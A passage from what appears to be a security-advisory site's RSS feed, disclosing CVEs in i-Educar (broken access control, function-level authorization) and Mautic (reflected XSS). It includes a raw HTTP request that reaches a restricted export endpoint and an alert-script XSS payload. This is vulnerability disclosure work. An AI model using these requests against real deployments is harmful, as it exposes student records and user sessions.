&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt; &amp;lt;code&amp;gt;POST /exportacao-para-o-seb&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;Authentication:&amp;lt;/b&amp;gt; Required&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to properly validate user permissions before granting access to this endpoint. As a result, even low-privileged users can successfully access the functionality intended only for .&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Authenticate as a non-privileged user.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10013/image.png&amp;#34;
	width=&amp;#34;1843&amp;#34;
	height=&amp;#34;533&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10013/image_hu_5ca2ea85ab6696dd.png 480w, /p/cve-2025-10013/image_hu_deb570b2049417e1.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;345&amp;#34;
		data-flex-basis=&amp;#34;829px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10013/image-1.png&amp;#34;
	width=&amp;#34;936&amp;#34;
	height=&amp;#34;436&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10013/image-1_hu_8cd5643a33eabd47.png 480w, /p/cve-2025-10013/image-1_hu_f205df0666d7bd3a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;214&amp;#34;
		data-flex-basis=&amp;#34;515px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Send the following request:&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 1
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 2
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 3
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 4
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 5
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 6
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 7
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 8
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt; 9
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;10
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;11
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;12
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;13
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;14
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;15
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;16
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;17
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;18
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;19
&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;20
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;POST /exportacao-para-o-seb HTTP/1.1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Host: localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept: text/html,application/xhtml&#43;xml,application/xml;q=0.9,*/*;q=0.8
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Language: en-US,en;q=0.5
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Accept-Encoding: gzip, deflate, br, zstd
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Type: application/x-www-form-urlencoded
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Content-Length: 47
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Origin: http://localhost
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Connection: keep-alive
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Referer: http://localhost/exportacao-para-o-seb
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Cookie: i_educar_session=ikrAPvWjSx0V5drm82zlgu1kBByJdsCx1gJkiwsu
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Upgrade-Insecure-Requests: 1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Dest: document
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Mode: navigate
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-Site: same-origin
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Sec-Fetch-User: ?1
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;Priority: u=0, i
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;ano=2025&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_instituicao=1&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;&amp;amp;amp;&amp;lt;/span&amp;gt;ref_cod_escola=4
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;We could observe that a file is attached to the response. This user shouldn&amp;#39;t do this request.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10013/image-2.png&amp;#34;
	width=&amp;#34;1434&amp;#34;
	height=&amp;#34;538&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10013/image-2_hu_d9f0374d4aca283a.png 480w, /p/cve-2025-10013/image-2_hu_6d9f4bc0f197d6ba.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;266&amp;#34;
		data-flex-basis=&amp;#34;639px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Broken Access Control vulnerabilities can have severe consequences, including:
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Unauthorized access to restricted functionality;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Escalation of privileges for low-level users;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Exposure of sensitive data and potential system compromise;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Loss of confidentiality and integrity of educational records;&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Reputational damage to the organization.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10013.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Fri, 05 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9823</title>
        <link>https://www.cvehunters.com/p/cve-2025-9823/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9823/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9823-cross-site-scripting-xss-reflected-in-endpoint-sajaxactionleadaddleadtags-parameter-tags&amp;#34;&amp;gt;CVE-2025-9823: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; endpoint of the Mautic application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9823-cross-site-scripting-xss-reflected-in-endpoint-sajaxactionleadaddleadtags-parameter-tags&amp;#34;&amp;gt;CVE-2025-9823: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9823&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;search_autocomplete&amp;lt;/code&amp;gt; endpoint of the Mautic application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/s/ajax?action=lead:addLeadTags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Tags&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application reflects this input directly in the response. Although the server applies sanitization before storing the data or returning it later, the payload is executed immediately in the victim’s browser upon reflection, allowing an attacker to run arbitrary JavaScript in the user’s session.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/mautic/mautic/security/advisories/GHSA-9v8p-m85m-f7mm&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 03 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9760</title>
        <link>https://www.cvehunters.com/p/cve-2025-9760/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9760/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9760-broken-function-level-authorization-bfla-on-matricula-api-allows-deletion-of-abandono-status&amp;#34;&amp;gt;CVE-2025-9760: Broken Function Level Authorization (BFLA) on &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; API allows deletion of “abandono” status
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A &amp;lt;b&amp;gt;Broken Function Level Authorization (BFLA)&amp;lt;/b&amp;gt; vulnerability was identified in the &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; API of the i-Educar application. This issue allows low-privileged users to delete the “abandono” (dropout) status of arbitrary student enrollments by manipulating request parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;b&amp;gt;Vulnerable Endpoint:&amp;lt;/b&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;code&amp;gt;GET /module/Api/aluno&amp;lt;/code&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;The application fails to enforce authorization checks to ensure that only privileged users (e.g., administrators) can perform sensitive operations like deleting an abandonment status. By altering the &amp;lt;code&amp;gt;id&amp;lt;/code&amp;gt; parameter, an attacker can affect records that do not belong to them.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9760-broken-function-level-authorization-bfla-on-matricula-api-allows-deletion-of-abandono-status&amp;#34;&amp;gt;CVE-2025-9760: Broken Function Level Authorization (BFLA) on &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; API allows deletion of “abandono” status
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9760&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A &amp;lt;b&amp;gt;Broken Function Level Authorization (BFLA)&amp;lt;/b&amp;gt; vulnerability was identified in the &amp;lt;code&amp;gt;matricula&amp;lt;/code&amp;gt; API of the i-Educar application. This issue allows low-privileged users to delete the “abandono” (dropout) status of arbitrary student enrollments by manipulating request parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
